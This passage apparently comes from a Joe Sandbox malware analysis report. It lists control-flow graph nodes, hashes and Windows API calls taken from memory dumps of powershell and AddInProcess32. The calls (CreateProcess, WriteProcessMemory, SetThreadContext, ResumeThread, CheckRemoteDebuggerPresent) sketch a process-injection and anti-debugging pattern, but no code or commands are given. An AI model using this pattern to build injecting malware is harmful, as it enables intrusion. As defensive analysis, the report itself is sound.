7fe899cb10f 140->142 143 7fe899cb111-7fe899cb124 140->143 141->130 142->143 143->143 144 7fe899cb126-7fe899cb12e 143->144 144->141 162 7fe899cb396-7fe899cb3aa 148->162 163 7fe899cb391 148->163 149->148 163->162
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.515074797.000007FE899C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7fe899c0000_powershell.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 4644ebef2a69deba647fb28afe56df232f78f77301649861ecb456bb18aaded6
                          • Instruction ID: 408cd57e41e93003b1fc85229ca873482abaaf5896f6e8c567ffb72334d51571
                          • Opcode Fuzzy Hash: 4644ebef2a69deba647fb28afe56df232f78f77301649861ecb456bb18aaded6
                          • Instruction Fuzzy Hash: 84F15C70918A8D8FEBB8EF18DC557E977E1FB59310F00412AD84ED72A1DB74A680CB81

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 164 7fe899ca90d-7fe899ca919 165 7fe899ca91b-7fe899ca923 164->165 166 7fe899ca924-7fe899ca9dc 164->166 165->166 169 7fe899caa04-7fe899caa96 WriteProcessMemory 166->169 170 7fe899ca9de-7fe899caa01 166->170 172 7fe899caa98 169->172 173 7fe899caa9e-7fe899cab0c 169->173 170->169 172->173
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.515074797.000007FE899C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7fe899c0000_powershell.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: 07d7c79c991e97771d20222cfb7d932932a250a1047a3d3c8dca3b1392e31f22
                          • Instruction ID: 0bb6f39ec5823dd605b80c7e2f9d3269995a5e3d7fbbaebf739282803ac665c9
                          • Opcode Fuzzy Hash: 07d7c79c991e97771d20222cfb7d932932a250a1047a3d3c8dca3b1392e31f22
                          • Instruction Fuzzy Hash: A3612870908A5D8FDB94DF68C885BE9BBF1FB69311F1081AAD04DE3266C774A985CB40

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 176 7fe899ca5b5-7fe899ca5c1 177 7fe899ca5cc-7fe899ca672 176->177 178 7fe899ca5c3-7fe899ca5cb 176->178 181 7fe899ca694-7fe899ca6f6 Wow64SetThreadContext 177->181 182 7fe899ca674-7fe899ca691 177->182 178->177 184 7fe899ca6f8 181->184 185 7fe899ca6fe-7fe899ca754 181->185 182->181 184->185
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.515074797.000007FE899C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7fe899c0000_powershell.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: bdde04c6e5e40ef3328a7eff972176bb065b727e58fa87d428127218a4d5719c
                          • Instruction ID: de0653078724dd22219681b8da9ae0b0330bda1ba1ee0fa8254100ce54785b37
                          • Opcode Fuzzy Hash: bdde04c6e5e40ef3328a7eff972176bb065b727e58fa87d428127218a4d5719c
                          • Instruction Fuzzy Hash: 3B514770D08A4D8FEB54DFA8C849BEDBBF1FB59311F10826AD049E3266D774A485CB40

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 188 7fe899ca45d-7fe899ca469 189 7fe899ca46b-7fe899ca473 188->189 190 7fe899ca474-7fe899ca483 188->190 189->190 191 7fe899ca485-7fe899ca48d 190->191 192 7fe899ca48e-7fe899ca560 ResumeThread 190->192 191->192 196 7fe899ca568-7fe899ca5b2 192->196 197 7fe899ca562 192->197 197->196
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.515074797.000007FE899C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7fe899c0000_powershell.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: e9ca747c484dced4c100d8589406c0d8eb7e57c8e5e31d182250e13793c1424d
                          • Instruction ID: ae7997f24db5982cb8492f353030d419314758e2b05e5ff935e40b3e1efbe933
                          • Opcode Fuzzy Hash: e9ca747c484dced4c100d8589406c0d8eb7e57c8e5e31d182250e13793c1424d
                          • Instruction Fuzzy Hash: 53518D70D0878C8FDB55DFA8D849BEDBFB0EB56320F0041AAD049E7262DA74A486CB41

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 243 7fe89a90b0e-7fe89a90b24 244 7fe89a90b26-7fe89a90b33 243->244 245 7fe89a90b3d-7fe89a90b42 243->245 244->245 246 7fe89a90b35-7fe89a90b3b 244->246 247 7fe89a90b48-7fe89a90b4b 245->247 248 7fe89a90bee-7fe89a90bf8 245->248 246->245 249 7fe89a90b4d-7fe89a90b60 247->249 250 7fe89a90b62 247->250 251 7fe89a90c07-7fe89a90c17 248->251 252 7fe89a90bfa-7fe89a90c06 248->252 256 7fe89a90b64-7fe89a90b66 249->256 250->256 253 7fe89a90c19-7fe89a90c1d 251->253 254 7fe89a90c24-7fe89a90c4a 251->254 253->254 256->248 257 7fe89a90b6c-7fe89a90b6f 256->257 259 7fe89a90b96 257->259 260 7fe89a90b71-7fe89a90b94 257->260 261 7fe89a90b98-7fe89a90b9a 259->261 260->261 261->248 262 7fe89a90b9c-7fe89a90bb8 261->262 266 7fe89a90bbe-7fe89a90bc7 262->266 267 7fe89a90bc9-7fe89a90bd6 266->267 268 7fe89a90be0-7fe89a90bed 266->268 267->268 269 7fe89a90bd8-7fe89a90bde 267->269 269->268
                          Memory Dump Source
                          • Source File: 0000000C.00000002.515226150.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7fe89a90000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 00321fe8c56f9749e3f77d6b20bf1909be6818bc30c65990f88d63fd12ac6542
                          • Instruction ID: dff24213fca315fd56254fc977fd78064fba54940a41da8e32b6636de4368e0b
                          • Opcode Fuzzy Hash: 00321fe8c56f9749e3f77d6b20bf1909be6818bc30c65990f88d63fd12ac6542
                          • Instruction Fuzzy Hash: 23416A31E1DAAA4FEB65A72C14643B8B7D1FF45294F1801FAC45FC71A3DA18AC10C380

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 289 7fe89a91f6b-7fe89a91f81 291 7fe89a91f89-7fe89a91fc0 289->291 292 7fe89a91f83-7fe89a91f87 289->292 293 7fe89a91fc2-7fe89a91fe2 291->293 294 7fe89a91fe3-7fe89a92075 291->294 292->291 293->294 300 7fe89a9207d-7fe89a92095 294->300
                          Memory Dump Source
                          • Source File: 0000000C.00000002.515226150.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7fe89a90000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2e99291d75d9623da00a083bda8fa17f6cd4e557efd3abf1e5faf6098a4dd8c9
                          • Instruction ID: 299aff1112badcd9ce1c257cb4889670bbf70c30e3c8a2bee24304f9b4b706d5
                          • Opcode Fuzzy Hash: 2e99291d75d9623da00a083bda8fa17f6cd4e557efd3abf1e5faf6098a4dd8c9
                          • Instruction Fuzzy Hash: 28316F1164E7C50FE707937858642A57FB1EF87268B2A10E7D48ACF2E3D9094D6AC372

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 324 7fe89a93bed-7fe89a93c09 326 7fe89a93c10-7fe89a93c19 324->326 327 7fe89a93c1b-7fe89a93c28 326->327 328 7fe89a93c32-7fe89a93c3f 326->328 327->328 329 7fe89a93c2a-7fe89a93c30 327->329 329->328
                          Memory Dump Source
                          • Source File: 0000000C.00000002.515226150.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7fe89a90000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cf259610b2e701be16a9b77a14556cf521998841b569fa79abdc58d02c7651f2
                          • Instruction ID: b177790344f85b2e58c13e51e10f5cdeca6bbee1b1746c57d78c5b0312d330ef
                          • Opcode Fuzzy Hash: cf259610b2e701be16a9b77a14556cf521998841b569fa79abdc58d02c7651f2
                          • Instruction Fuzzy Hash: 4FF0B421E1DADD0AEB96A37C24152E47B91EF4A161B2801FAC49DD7163DD089C198380

                          Execution Graph

                          Execution Coverage:11.4%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:100%
                          Total number of Nodes:3
                          Total number of Limit Nodes:0
                          execution_graph 12327 3d5310 12328 3d5354 CheckRemoteDebuggerPresent 12327->12328 12329 3d5396 12328->12329

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 696 721d60-721d7e 697 721d80-721d83 696->697 698 721da6-721da9 697->698 699 721d85-721da1 697->699 700 721dca-721dcd 698->700 701 721dab-721dc5 698->701 699->698 702 721dda-721ddd 700->702 703 721dcf-721dd9 700->703 701->700 706 721df4-721df6 702->706 707 721ddf-721ded 702->707 708 721df8 706->708 709 721dfd-721e00 706->709 713 721e06-721e1c 707->713 714 721def 707->714 708->709 709->697 709->713 716 721e22-721e2b 713->716 717 722038-722042 713->717 714->706 718 722043-72207f 716->718 719 721e31-721e4e 716->719 722 722081-722084 718->722 728 721e54-721e7c 719->728 729 722025-722032 719->729 724 722086-7220a2 722->724 725 7220a7-7220aa 722->725 724->725 726 7220b0-7220bc 725->726 727 722157-72215a 725->727 735 7220c7-7220c9 726->735 730 722390-722392 727->730 731 722160-72216f 727->731 728->729 750 721e82-721e8b 728->750 729->716 729->717 733 722394 730->733 734 722399-72239c 730->734 746 722171-72218c 731->746 747 72218e-7221d2 731->747 733->734 734->722 738 7223a2-7223ab 734->738 739 7220e1-7220e5 735->739 740 7220cb-7220d1 735->740 744 7220f3 739->744 745 7220e7-7220f1 739->745 742 7220d3 740->742 743 7220d5-7220d7 740->743 742->739 743->739 749 7220f8-7220fa 744->749 745->749 746->747 756 722364-72237a 747->756 757 7221d8-7221e9 747->757 752 722111-72214a 749->752 753 7220fc-7220ff 749->753 750->718 755 721e91-721ead 750->755 752->731 776 72214c-722156 752->776 753->738 762 722013-72201f 755->762 763 721eb3-721edd 755->763 756->730 766 72234f-72235e 757->766 767 7221ef-72220c 757->767 762->729 762->750 779 721ee3-721f0b 763->779 780 722009-72200e 763->780 766->756 766->757 767->766 778 722212-722309 767->778 827 722317 778->827 828 72230b-722315 778->828 779->780 787 721f11-721f3f 779->787 780->762 787->780 792 721f45-721f4e 787->792 792->780 793 721f54-721f86 792->793 801 721f91-721fad 793->801 802 721f88-721f8c 793->802 801->762 804 721faf-722007 801->804 802->780 803 721f8e 802->803 803->801 804->762 829 72231c-72231e 827->829 828->829 829->766 830 722320-722325 829->830 831 722333 830->831 832 722327-722331 830->832 833 722338-72233a 831->833 832->833 833->766 834 72233c-722348 833->834 834->766
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.619064038.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_720000_AddInProcess32.jbxd
                          Similarity
                          • API ID:
                          • String ID: $p$$p
                          • API String ID: 0-580715581
                          • Opcode ID: 11d868b9ac448e3b9e08d2c80b1c3d57e226a0eb42cf345dd937ffe5436a1a50
                          • Instruction ID: 87ca0072a279cac3278f680a66105adaa70b709aa1d608242f3258c6fbeffff1
                          • Opcode Fuzzy Hash: 11d868b9ac448e3b9e08d2c80b1c3d57e226a0eb42cf345dd937ffe5436a1a50
                          • Instruction Fuzzy Hash: C2029E30B00215DFDB25DB64E490BAEB7E2EF84310F648469D405EB396DB39ED46CB90

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 968 3d5310-3d5394 CheckRemoteDebuggerPresent 970 3d539d-3d53d8 968->970 971 3d5396-3d539c 968->971 971->970
                          APIs
                          • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 003D5387
                          Memory Dump Source
                          • Source File: 0000000E.00000002.618828365.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_3d0000_AddInProcess32.jbxd
                          Similarity
                          • API ID: CheckDebuggerPresentRemote
                          • String ID:
                          • API String ID: 3662101638-0
                          • Opcode ID: 10a76493b86b414f14fd99e3022073ddd87ad0b3b7f2b54fae167e31aad6ebdc
                          • Instruction ID: 66a02c3c8278f931ec9a32e1ca7129e909697dbc017297fc036bb7fbe7e8776e
                          • Opcode Fuzzy Hash: 10a76493b86b414f14fd99e3022073ddd87ad0b3b7f2b54fae167e31aad6ebdc
                          • Instruction Fuzzy Hash: F02128B68002198FCB10CF9AD884BEEFBF4AF49320F14845AD455A7350D778A944CFA1
                          Memory Dump Source
                          • Source File: 0000000E.00000002.619064038.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_720000_AddInProcess32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d6d37ec47223149dfcea3c218d73de64470800d93f5ad030f503cec0eecf8a42
                          • Instruction ID: 5bb32e464f9b7bc2fc87e3c87f808954a8226d039574a5b17d923aef7811be4a
                          • Opcode Fuzzy Hash: d6d37ec47223149dfcea3c218d73de64470800d93f5ad030f503cec0eecf8a42
                          • Instruction Fuzzy Hash: AB62A034B002149FDB24DB68E594BADB7F2EF84310F548469E406EB396DB39ED46CB90

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 135 721070-72108c 136 72108e-721091 135->136 137 721093-7210af 136->137 138 7210b4-7210b6 136->138 137->138 139 7210b8 138->139 140 7210bd-7210c0 138->140 139->140 140->136 142 7210c2-7211dd 140->142 161 7211e9-7211f8 142->161 162 7211df-7211e3 142->162 163 721656-721660 161->163 164 7211fe-721207 161->164 162->161 165 72164c-721651 164->165 166 72120d-721218 164->166 165->163 167 721626-721632 166->167 168 72121e-721235 166->168 167->164 169 721638 167->169 168->167 172 72123b-721244 168->172 169->163 172->165 173 72124a-72126f 172->173 176 721614-721620 173->176 177 721275-72128c 173->177 176->167 176->172 177->176 179 721292-72129b 177->179 179->165 180 7212a1-7212bb 179->180 182 7212c2-7212c4 180->182 183 7212c6-7212d6 182->183 184 72130e-721321 182->184 189 721326-721359 183->189 190 7212d8-7212e8 183->190 185 7215f0-7215f4 184->185 187 7215f6 185->187 188 7215ff 185->188 187->188 188->176 198 72139b-7213ab 189->198 199 72135b-721399 189->199 190->189 193 7212ea-7212fa 190->193 193->189 196 7212fc-72130c 193->196 196->184 196->189 203 7213c3-7213d8 198->203 204 7213ad-7213b3 198->204 210 7213da-721441 199->210 203->210 206 7213b7-7213b9 204->206 207 7213b5 204->207 206->203 207->203 218 7214f3-721513 210->218 219 721447-72144a 210->219 228 721515-721556 218->228 229 72156b-721577 218->229 220 721450-721460 219->220 221 7215d1-7215d6 219->221 225 721466-7214bb 220->225 226 7214e9-7214ed 220->226 230 7215db-7215ee 221->230 225->221 253 7214c1-7214db 225->253 226->218 226->219 228->221 250 721558-721569 228->250 235 721579-72157f 229->235 236 72158f-7215a4 229->236 230->185 237 721583-721585 235->237 238 721581 235->238 243 7215a6-7215cf 236->243 237->236 238->236 243->230 250->243 253->221 256 7214e1-7214e7 253->256 256->218
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.619064038.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_720000_AddInProcess32.jbxd
                          Similarity
                          • API ID:
                          • String ID: $p$$p$$p$$p$$p$$p
                          • API String ID: 0-3402276426
                          • Opcode ID: 9ad38b3a7baa98380fd9ef3fb0b7a2ac66539d94933291238a7d814bc0c56bfa
                          • Instruction ID: 4de832369c195b1c90e36de44bd6489f02a593c50b43a91a8bb81086720ca3a2
                          • Opcode Fuzzy Hash: 9ad38b3a7baa98380fd9ef3fb0b7a2ac66539d94933291238a7d814bc0c56bfa
                          • Instruction Fuzzy Hash: 0FF1F734A00214CFDB19EFA4E594B6EBBB2BF98300F648569D405AB359DB35DC42CB90

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 836 723130-72316a 837 723190-7231ae 836->837 838 72316c-72318b 836->838 843 7231b0-7231b8 837->843 844 7231c6-7231dc 837->844 838->837 843->844 847 7231e7-7231e9 844->847 848 723201-723272 847->848 849 7231eb-7231f3 847->849 859 723274-723297 848->859 860 72329e-7232ba 848->860 849->848 859->860 865 7232e6-723301 860->865 866 7232bc-7232df 860->866 871 723303-723325 865->871 872 72332c-723347 865->872 866->865 871->872 877 723372-723a71 872->877 878 723349-72336b 872->878 878->877
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.619064038.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_720000_AddInProcess32.jbxd
                          Similarity
                          • API ID:
                          • String ID: $p$$p
                          • API String ID: 0-580715581
                          • Opcode ID: 15a3d8016a4efe982435800e013faf26fdd713cb5bfd5bf20d3bafe25bda9aa1
                          • Instruction ID: 7a39bb1524b1b1dced412feb203c373bb4ac2f2aee5cf8a2dca4ef6e6a1e3568
                          • Opcode Fuzzy Hash: 15a3d8016a4efe982435800e013faf26fdd713cb5bfd5bf20d3bafe25bda9aa1
                          • Instruction Fuzzy Hash: D4513F34B006168FDB58DF74D9A0BAEB7F2EB84340F14846AD806EB385EB39DD458B50

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 974 724f30-724f49 975 724f4b-724f4e 974->975 976 724f50-724f54 975->976 977 724f5b-724f5e 975->977 978 724f56 976->978 979 724f99-724fa2 976->979 980 724f80-724f83 977->980 981 724f60-724f71 977->981 978->977 984 72507b-725085 979->984 985 724fa8-724fae 979->985 982 724f90-724f93 980->982 983 724f85-724f8f 980->983 1054 724f73 call 724f30 981->1054 1055 724f73 call 724f20 981->1055 982->979 986 725086-725089 982->986 987 724fb4-724fd3 985->987 988 7250c8-7250fd 985->988 990 72508b-7250a7 986->990 991 7250ac-7250ae 986->991 1006 724fd9-725014 987->1006 1007 72506c-725075 987->1007 997 7250ff-725102 988->997 990->991 995 7250b0 991->995 996 7250b5-7250b8 991->996 992 724f79-724f7b 992->980 995->996 996->975 999 7250be-7250c7 996->999 1000 725108-72512e 997->1000 1001 72525e-725261 997->1001 1020 725135-725163 1000->1020 1003 725263-72527f 1001->1003 1004 725284-725286 1001->1004 1003->1004 1009 725288 1004->1009 1010 72528d-725290 1004->1010 1023 725016-725019 1006->1023 1024 72501e-725028 1006->1024 1007->984 1007->985 1009->1010 1010->997 1012 725296-72529f 1010->1012 1031 725165-72516f 1020->1031 1032 7251da-7251fe 1020->1032 1023->999 1024->1007 1028 72502a-72503e 1024->1028 1033 725040-72504a 1028->1033 1034 72504c 1028->1034 1040 725171-725177 1031->1040 1041 725187-7251d8 1031->1041 1046 725200 1032->1046 1047 725208 1032->1047 1036 725051-725053 1033->1036 1034->1036 1038 725055-725058 1036->1038 1039 72505f-72506a 1036->1039 1038->1039 1039->1007 1039->1028 1044 72517b-72517d 1040->1044 1045 725179 1040->1045 1041->1031 1041->1032 1044->1041 1045->1041 1046->1047 1047->1001 1054->992 1055->992
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.619064038.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_720000_AddInProcess32.jbxd
                          Similarity
                          • API ID:
                          • String ID: PHp
                          • API String ID: 0-2495607638
                          • Opcode ID: 4b949dd96edc8dcec86fb85edcbd50586b092f8f06ea047eb8cc49f2a05b42ce
                          • Instruction ID: 2ab7596657db795f3b4e8cd26fa41b5936be2b9fa54c72db4a86ffaffa14340c
                          • Opcode Fuzzy Hash: 4b949dd96edc8dcec86fb85edcbd50586b092f8f06ea047eb8cc49f2a05b42ce
                          • Instruction Fuzzy Hash: D781E431B006248FDF259B78E8947AEBBE2EBC8310F248469E406DB385DB39DD458791

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1160 722050-72207f 1161 722081-722084 1160->1161 1162 722086-7220a2 1161->1162 1163 7220a7-7220aa 1161->1163 1162->1163 1164 7220b0-7220bc 1163->1164 1165 722157-72215a 1163->1165 1171 7220c7-7220c9 1164->1171 1166 722390-722392 1165->1166 1167 722160-72216f 1165->1167 1169 722394 1166->1169 1170 722399-72239c 1166->1170 1181 722171-72218c 1167->1181 1182 72218e-7221d2 1167->1182 1169->1170 1170->1161 1173 7223a2-7223ab 1170->1173 1174 7220e1-7220e5 1171->1174 1175 7220cb-7220d1 1171->1175 1179 7220f3 1174->1179 1180 7220e7-7220f1 1174->1180 1177 7220d3 1175->1177 1178 7220d5-7220d7 1175->1178 1177->1174 1178->1174 1183 7220f8-7220fa 1179->1183 1180->1183 1181->1182 1188 722364-72237a 1182->1188 1189 7221d8-7221e9 1182->1189 1185 722111-72214a 1183->1185 1186 7220fc-7220ff 1183->1186 1185->1167 1203 72214c-722156 1185->1203 1186->1173 1188->1166 1195 72234f-72235e 1189->1195 1196 7221ef-72220c 1189->1196 1195->1188 1195->1189 1196->1195 1204 722212-722309 1196->1204 1227 722317 1204->1227 1228 72230b-722315 1204->1228 1229 72231c-72231e 1227->1229 1228->1229 1229->1195 1230 722320-722325 1229->1230 1231 722333 1230->1231 1232 722327-722331 1230->1232 1233 722338-72233a 1231->1233 1232->1233 1233->1195 1234 72233c-722348 1233->1234 1234->1195
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.619064038.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_720000_AddInProcess32.jbxd
                          Similarity
                          • API ID:
                          • String ID: $p
                          • API String ID: 0-982128392
                          • Opcode ID: af322769d40450b76e55deeafd6b30de584f9c373f23dbb89bc182dc8314f4e0
                          • Instruction ID: d2796e9c85120a4beb0b81e6932f60944bdced0fae7bfdb7e960577134617996
                          • Opcode Fuzzy Hash: af322769d40450b76e55deeafd6b30de584f9c373f23dbb89bc182dc8314f4e0
                          • Instruction Fuzzy Hash: 00112531704368ABCF348A65F9816AEBBA1EB80310F24446EDD01EB257D7B9DD4BC791
                          Memory Dump Source
                          • Source File: 0000000E.00000002.619064038.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_720000_AddInProcess32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a762f240558092affe96cfab5e08516d0be8b2d53930187175a03c1012853e8d
                          • Instruction ID: f28fa48bd51e0a00b788e3f6404bf7e8c04fa9bf40518db42009759bc4f04118
                          • Opcode Fuzzy Hash: a762f240558092affe96cfab5e08516d0be8b2d53930187175a03c1012853e8d
                          • Instruction Fuzzy Hash: 15811A70A01214CFDB19EF64E594B9EB7B6FF94300F648529E405AB399DB35EC42CB80
                          Memory Dump Source
                          • Source File: 0000000E.00000002.619064038.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_720000_AddInProcess32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ef3e6fe08d818ce6a600a23d3b95dc620649b3eb5590c6358d0802413bc00de6
                          • Instruction ID: f9f56e6ddd0fe8dcb61a2e779ba42ecbebaf8227d2f7f00af4400aac50b0384d
                          • Opcode Fuzzy Hash: ef3e6fe08d818ce6a600a23d3b95dc620649b3eb5590c6358d0802413bc00de6
                          • Instruction Fuzzy Hash: A621A135B012189BCF14DA69F99479EBBF6EF94310F548429E405EB382E735EC458BD0
                          Memory Dump Source
                          • Source File: 0000000E.00000002.618475068.000000000014D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0014D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_14d000_AddInProcess32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6ce1039df2145ae391cbab6c1dd74a44d7292b58ba90f05aa95976bebb917f57
                          • Instruction ID: 6b5c3cc383cd31fc09e783eff7c6d14a58c230bdd72aafe76bce6b432eb880de
                          • Opcode Fuzzy Hash: 6ce1039df2145ae391cbab6c1dd74a44d7292b58ba90f05aa95976bebb917f57
                          • Instruction Fuzzy Hash: C621B075604240EFDF15CF14E884B26BB65EB84314F34C5A9E8494B266C73AD847CBA1
                          Memory Dump Source
                          • Source File: 0000000E.00000002.619064038.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_720000_AddInProcess32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e3a1ed4d03bb4d27e3a82b21664a51ac9516b3ec0daf03829a951de55e725cc0
                          • Instruction ID: 87bee3205b52cc723067516ae6f74ae5caf2c730de712cbdffc1a5051e2c9e61
                          • Opcode Fuzzy Hash: e3a1ed4d03bb4d27e3a82b21664a51ac9516b3ec0daf03829a951de55e725cc0
                          • Instruction Fuzzy Hash: 5421C234A00219CBCB14EF94E684AADB7F2FF58315FA48566D801AB346D734EC82CB50
                          Memory Dump Source
                          • Source File: 0000000E.00000002.618475068.000000000014D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0014D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_14d000_AddInProcess32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a0b29ad5bf8bf0666212b14fe499c174270008ec820696f8e16661ad236003d5
                          • Instruction ID: 234ca13218f4ce575a79851ae6041649a99f601048c4a4bdce8ef36ccea3fb41
                          • Opcode Fuzzy Hash: a0b29ad5bf8bf0666212b14fe499c174270008ec820696f8e16661ad236003d5
                          • Instruction Fuzzy Hash: 332162755083809FDB02CF14D994715BF71EB46314F28C5EAD8498F267C33AD85ACB62
                          Memory Dump Source
                          • Source File: 0000000E.00000002.619064038.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_720000_AddInProcess32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1e3ab47e21e8fc2edc0faae175d38ee9ae39b4e3555a93880ba732647e071fea
                          • Instruction ID: 229c58c24cc0b73196adbd7d1f6fc583419a2a0afb49e539a48054b376ec7b2c
                          • Opcode Fuzzy Hash: 1e3ab47e21e8fc2edc0faae175d38ee9ae39b4e3555a93880ba732647e071fea
                          • Instruction Fuzzy Hash: A80128317042A54FEB22663DE81136E3B9AEFD2310F5A4C76E049CF2A1DA1CDD468795
                          Memory Dump Source
                          • Source File: 0000000E.00000002.619064038.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_720000_AddInProcess32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fb265f2e4787a90843dab433b0f9435e6c645f24bdb495e02a55214477c5db58
                          • Instruction ID: fee2cf057a23f52192cf35fc6c7cbaa4b8a891dacdc288c06936c2b01cbb6f7b
                          • Opcode Fuzzy Hash: fb265f2e4787a90843dab433b0f9435e6c645f24bdb495e02a55214477c5db58
                          • Instruction Fuzzy Hash: 6F0131317002245BDB64EA6CE89476E73D5EB99710F108828E50AEB355DA69DC4647C4
                          Memory Dump Source
                          • Source File: 0000000E.00000002.619064038.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_720000_AddInProcess32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6ad3d49d5eba98c484f8813785290cbe9585b7d02b8b6697361f65203347a0cf
                          • Instruction ID: 48b25422500bfd183ca034b0a9153424e08121738247e7b252c7d38eba7f6614
                          • Opcode Fuzzy Hash: 6ad3d49d5eba98c484f8813785290cbe9585b7d02b8b6697361f65203347a0cf
                          • Instruction Fuzzy Hash: 77F02B35B041149FEF209AB8F8A879BBBA1E7C4325F148436E906D7280C2289D558B90
                          Strings
                          Memory Dump Source
